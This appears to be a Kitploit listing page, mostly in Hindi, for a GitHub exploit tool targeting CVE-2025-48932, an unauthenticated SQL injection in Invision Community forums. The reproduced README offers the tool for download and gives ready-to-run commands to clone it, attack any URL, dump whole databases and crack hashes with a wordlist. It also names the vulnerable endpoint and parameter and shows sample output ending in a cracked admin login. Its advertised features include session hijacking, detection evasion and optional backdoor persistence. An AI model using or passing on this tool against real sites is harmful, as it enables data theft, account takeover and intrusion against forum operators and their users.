Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - Invision Community ≤ 4.7.20 के लिए अनधिकृत SQL इंजेक्शन शोषण। डेटाबेस गणना, क्रेडेंशियल डंपिंग, एडमिन अधिग्रहण, सत्र अपहरण और मल्टी-थ्रेडिंग के साथ पूर्ण स्वचालित शोषण। कोई निर्भरता आवश्यक नहीं। सुदीपा वानिगरत्ना द्वारा सुरक्षा अनुसंधान उपकरण। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनापोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

CVE-2025-48932 - Invision Community ≤ 4.7.20 के लिए अनधिकृत SQL इंजेक्शन शोषण। डेटाबेस गणना, क्रेडेंशियल डंपिंग, एडमिन अधिग्रहण, सत्र अपहरण और मल्टी-थ्रेडिंग के साथ पूर्ण स्वचालित शोषण। कोई निर्भरता आवश्यक नहीं। सुदीपा वानिगरत्ना द्वारा सुरक्षा अनुसंधान उपकरण।

रिपॉजिटरी देखें
1181 महीना पहलेअभी तक समीक्षित नहीं

🔓 CVE-2025-48932 - Invision Community SQL इंजेक्शन एक्सप्लॉइट

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ गंभीर भेद्यता अवलोकन

CVE-2025-48932 Invision Community संस्करण ≤ 4.7.20 में खोजी गई एक गंभीर अप्रमाणित ब्लाइंड SQL इंजेक्शन भेद्यता है। यह एक्सप्लॉइट दूरस्थ हमलावरों को अनुमति देता है:

  • 🔍 संवेदनशील डेटाबेस जानकारी निकालें
  • 👤 उपयोगकर्ता क्रेडेंशियल और पासवर्ड हैश चुराएं
  • 🔑 व्यवस्थापक खातों पर कब्जा करें
  • 🎯 सक्रिय उपयोगकर्ता सत्रों को हाईजैक करें
  • 💻 व्यवस्थापक अधिग्रहण के माध्यम से रिमोट कोड निष्पादन (RCE) प्राप्त करें
  • 📊 संपूर्ण डेटाबेस सामग्री डंप करें

🎯 विशेषताएं

विशेषताविवरणस्थिति
🚀 शून्य निर्भरताएंशुद्ध Python मानक पुस्तकालय - pip इंस्टॉल की आवश्यकता नहीं✅
⚡ मल्टी-थ्रेडेडकॉन्फ़िगर करने योग्य थ्रेड्स के साथ बिजली-तेज़ डेटा निष्कर्षण✅
🤖 पूर्णतः स्वचालितपहचान से रिपोर्टिंग तक पूर्ण शोषण श्रृंखला✅
👑 व्यवस्थापक अधिग्रहणसत्र हाईजैकिंग और विशेषाधिकार वृद्धि✅
🔑 क्रेडेंशियल डंपिंगउपयोगकर्ता, पासवर्ड हैश, ईमेल निकालें✅
🔓 पासवर्ड क्रैकिंगवर्डलिस्ट समर्थन के साथ अंतर्निहित हैश क्रैकिंग✅
📋 JSON रिपोर्टिंगविश्लेषण और दस्तावेज़ीकरण के लिए संरचित आउटपुट✅
🔌 प्रॉक्सी समर्थनBurp Suite और कस्टम प्रॉक्सी एकीकरण✅
🎨 रंगीन आउटपुटप्रगति संकेतकों के साथ सुंदर टर्मिनल आउटपुट✅
🛡️ रेट लिमिटिंगपहचान से बचने के लिए अंतर्निहित विलंब✅

📊 डेमो और स्क्रीनशॉट

एक्सप्लॉइट निष्पादन

$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

नमूना JSON आउटपुट

{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 त्वरित आरंभ मार्गदर्शिका

स्थापना

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# No dependencies to install! Just run it.

मूल उपयोग

# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only

# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v

# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# Save results to custom file
python3 exploit.py -u https://example.com -o results.json

# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10

# Dump all available data
python3 exploit.py -u https://example.com --dump-all

उन्नत उपयोग

# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json

# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug

📋 आवश्यकताएं

सिस्टम आवश्यकताएं

  • Python: 3.6 या उच्चतर
  • OS: Linux, Windows, macOS (Python वाला कोई भी OS)
  • Memory: न्यूनतम (~50MB RAM)
  • Storage: ~100KB (केवल एक्सप्लॉइट)

निर्भरताएं

✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!

वैकल्पिक (पासवर्ड क्रैकिंग के लिए)

  • Wordlist: rockyou.txt या कोई भी कस्टम वर्डलिस्ट
    # Download popular wordlist
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ तकनीकी विवरण

भेद्यता स्थान

  • फ़ाइल: /applications/calendar/modules/front/calendar/view.php
  • विधि: IPS\calendar\modules\front\calendar\view::search()
  • पैरामीटर: location (उपयोगकर्ता-आपूर्ति इनपुट)
  • प्रकार: बूलियन-आधारित ब्लाइंड SQL इंजेक्शन

हमला वेक्टर

GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

शोषण श्रृंखला

  1. पहचान: बूलियन-आधारित इंजेक्शन पहचान
  2. गणना: डेटाबेस संरचना निकालें
  3. निष्कर्षण: संवेदनशील डेटा डंप करें
  4. क्रेडेंशियल चोरी: उपयोगकर्ता क्रेडेंशियल निकालें
  5. विशेषाधिकार वृद्धि: व्यवस्थापक खाता अधिग्रहण
  6. सत्र हाईजैकिंग: सक्रिय सत्र चुराएं
  7. स्थिरता: बैकडोर स्थापित करें (वैकल्पिक)

समर्थित डेटाबेस संस्करण

  • MySQL 5.0+
  • MariaDB 5.5+
  • Percona Server

🔒 सुरक्षा और कानूनी सूचना

⚠️ महत्वपूर्ण अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।

टूल डाउनलोड करें